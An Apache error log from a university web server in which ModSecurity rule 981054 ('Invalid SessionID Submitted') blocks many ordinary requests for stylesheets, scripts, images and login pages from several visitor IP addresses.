[Mon Aug 28 08:34:46.263203 2023] [:error] [pid 38065] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOv5tsCo-f0AAJSxZGQAAAAH"]
[Mon Aug 28 08:34:46.353142 2023] [:error] [pid 38389] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv5tsCo-f0AAJX1kvoAAAAS"]
[Mon Aug 28 08:35:04.274881 2023] [:error] [pid 38059] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv5yMCo-f0AAJSr3HIAAAAO"]
[Mon Aug 28 08:35:04.523689 2023] [:error] [pid 38503] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv5yMCo-f0AAJZnSPAAAAAB"]
[Mon Aug 28 08:35:09.998522 2023] [:error] [pid 38499] [client 114.122.103.110] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv5zcCo-f0AAJZjwFQAAAAC"]
[Mon Aug 28 08:35:41.737248 2023] [:error] [pid 38503] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv57cCo-f0AAJZnST0AAAAB"]
[Mon Aug 28 08:35:41.738661 2023] [:error] [pid 38500] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv57cCo-f0AAJZkdvUAAAAD"]
[Mon Aug 28 08:35:41.806359 2023] [:error] [pid 38059] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv57cCo-f0AAJSr3MEAAAAO"]
[Mon Aug 28 08:35:41.806853 2023] [:error] [pid 38114] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv57cCo-f0AAJTin3QAAAAE"]
[Mon Aug 28 08:35:41.807441 2023] [:error] [pid 38499] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv57cCo-f0AAJZjwJ8AAAAC"]
[Mon Aug 28 08:35:41.815554 2023] [:error] [pid 38503] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv57cCo-f0AAJZnST4AAAAB"]
[Mon Aug 28 08:35:41.837490 2023] [:error] [pid 38303] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv57cCo-f0AAJWfZWsAAAAI"]
[Mon Aug 28 08:35:41.842372 2023] [:error] [pid 38114] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv57cCo-f0AAJTin3UAAAAE"]
[Mon Aug 28 08:35:41.859086 2023] [:error] [pid 38503] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv57cCo-f0AAJZnST8AAAAB"]
[Mon Aug 28 08:35:41.880684 2023] [:error] [pid 38114] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv57cCo-f0AAJTin3YAAAAE"]
[Mon Aug 28 08:35:41.920138 2023] [:error] [pid 38499] [client 101.128.70.66] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv57cCo-f0AAJZjwKAAAAAC"]
[Mon Aug 28 08:36:17.917099 2023] [:error] [pid 38379] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/profil/pimpinan"] [unique_id "ZOv6EcCo-f0AAJXrJGUAAAAP"]
[Mon Aug 28 08:36:18.346927 2023] [:error] [pid 38389] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv6EsCo-f0AAJX1k3UAAAAS"]
[Mon Aug 28 08:36:48.534687 2023] [:error] [pid 38065] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv6MMCo-f0AAJSxZUIAAAAH"]
[Mon Aug 28 08:36:48.596827 2023] [:error] [pid 38303] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOv6MMCo-f0AAJWfZgMAAAAI"]
[Mon Aug 28 08:36:48.611861 2023] [:error] [pid 38059] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOv6MMCo-f0AAJSr3XAAAAAO"]
[Mon Aug 28 08:36:48.612292 2023] [:error] [pid 38065] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOv6MMCo-f0AAJSxZUMAAAAH"]
[Mon Aug 28 08:36:48.646699 2023] [:error] [pid 38303] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOv6MMCo-f0AAJWfZgQAAAAI"]
[Mon Aug 28 08:36:48.660596 2023] [:error] [pid 38059] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOv6MMCo-f0AAJSr3XEAAAAO"]
[Mon Aug 28 08:36:48.672529 2023] [:error] [pid 38114] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv6MMCo-f0AAJTioB4AAAAE"]
[Mon Aug 28 08:36:48.688242 2023] [:error] [pid 38303] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv6MMCo-f0AAJWfZgUAAAAI"]
[Mon Aug 28 08:36:48.726582 2023] [:error] [pid 38059] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOv6MMCo-f0AAJSr3XIAAAAO"]
[Mon Aug 28 08:36:48.742950 2023] [:error] [pid 38303] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOv6MMCo-f0AAJWfZgYAAAAI"]
[Mon Aug 28 08:36:48.780072 2023] [:error] [pid 38500] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv6MMCo-f0AAJZkd6YAAAAD"]
[Mon Aug 28 08:36:48.808351 2023] [:error] [pid 38389] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv6MMCo-f0AAJX1k8MAAAAS"]
[Mon Aug 28 08:36:48.924846 2023] [:error] [pid 38379] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOv6MMCo-f0AAJXrJKEAAAAP"]
[Mon Aug 28 08:36:48.927453 2023] [:error] [pid 38538] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv6MMCo-f0AAJaKUfQAAAAF"]
[Mon Aug 28 08:36:55.462292 2023] [:error] [pid 38500] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv6N8Co-f0AAJZkd7cAAAAD"]
[Mon Aug 28 08:36:55.529540 2023] [:error] [pid 38303] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOv6N8Co-f0AAJWfZh0AAAAI"]
[Mon Aug 28 08:36:55.784421 2023] [:error] [pid 38389] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOv6N8Co-f0AAJX1k@AAAAAS"]
[Mon Aug 28 08:36:55.828591 2023] [:error] [pid 38303] [client 123.253.233.82] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOv6N8Co-f0AAJWfZh8AAAAI"]
[Mon Aug 28 08:36:55.895602 2023] [:error] [pid 38059] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOv6N8Co-f0AAJSr3YwAAAAO"]
[Mon Aug 28 08:36:55.943493 2023] [:error] [pid 38065] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOv6N8Co-f0AAJSxZUsAAAAH"]
[Mon Aug 28 08:36:56.005409 2023] [:error] [pid 38114] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOv6OMCo-f0AAJTioDcAAAAE"]
[Mon Aug 28 08:37:02.860069 2023] [:error] [pid 38389] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOv6PsCo-f0AAJX1k@sAAAAS"]
[Mon Aug 28 08:37:03.044433 2023] [:error] [pid 38386] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOv6P8Co-f0AAJXyOQkAAAAM"]
[Mon Aug 28 08:37:03.107142 2023] [:error] [pid 38500] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOv6P8Co-f0AAJZkd78AAAAD"]
[Mon Aug 28 08:37:03.174702 2023] [:error] [pid 38386] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv6P8Co-f0AAJXyOQoAAAAM"]
[Mon Aug 28 08:37:03.383086 2023] [:error] [pid 38114] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOv6P8Co-f0AAJTioEAAAAAE"]
[Mon Aug 28 08:37:03.383171 2023] [:error] [pid 38499] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOv6P8Co-f0AAJZjwUcAAAAC"]
[Mon Aug 28 08:37:03.453241 2023] [:error] [pid 38389] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOv6P8Co-f0AAJX1k@0AAAAS"]
[Mon Aug 28 08:37:03.474156 2023] [:error] [pid 38386] [client 103.161.206.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOv6P8Co-f0AAJXyOQsAAAAM"]
[Mon Aug 28 08:37:19.355187 2023] [:error] [pid 38499] [client 112.215.209.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv6T8Co-f0AAJZjwWIAAAAC"]
[Mon Aug 28 08:37:19.592003 2023] [:error] [pid 38503] [client 112.215.209.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv6T8Co-f0AAJZnSYgAAAAB"]
[Mon Aug 28 08:37:32.208563 2023] [:error] [pid 38303] [client 112.215.209.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv6XMCo-f0AAJWfZmAAAAAI"]
[Mon Aug 28 08:37:32.310597 2023] [:error] [pid 38539] [client 112.215.209.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv6XMCo-f0AAJaL19gAAAAG"]
[Mon Aug 28 08:37:40.380111 2023] [:error] [pid 38114] [client 112.215.209.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv6ZMCo-f0AAJTioHgAAAAE"]
[Mon Aug 28 08:37:40.499980 2023] [:error] [pid 38499] [client 112.215.209.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv6ZMCo-f0AAJZjwY8AAAAC"]
[Mon Aug 28 08:37:49.275014 2023] [:error] [pid 38303] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv6bcCo-f0AAJWfZoQAAAAI"]
[Mon Aug 28 08:37:49.276512 2023] [:error] [pid 38499] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv6bcCo-f0AAJZjwZ0AAAAC"]
[Mon Aug 28 08:37:49.312196 2023] [:error] [pid 38503] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv6bcCo-f0AAJZnSdoAAAAB"]
[Mon Aug 28 08:37:49.326204 2023] [:error] [pid 38539] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv6bcCo-f0AAJaL2AsAAAAG"]
[Mon Aug 28 08:37:49.326622 2023] [:error] [pid 38538] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv6bcCo-f0AAJaKUngAAAAF"]
[Mon Aug 28 08:37:49.334960 2023] [:error] [pid 38059] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv6bcCo-f0AAJSr3d0AAAAO"]
[Mon Aug 28 08:37:49.426868 2023] [:error] [pid 38539] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv6bcCo-f0AAJaL2AwAAAAG"]
[Mon Aug 28 08:37:49.431420 2023] [:error] [pid 38538] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv6bcCo-f0AAJaKUnkAAAAF"]
[Mon Aug 28 08:37:49.520744 2023] [:error] [pid 38503] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv6bcCo-f0AAJZnSdsAAAAB"]
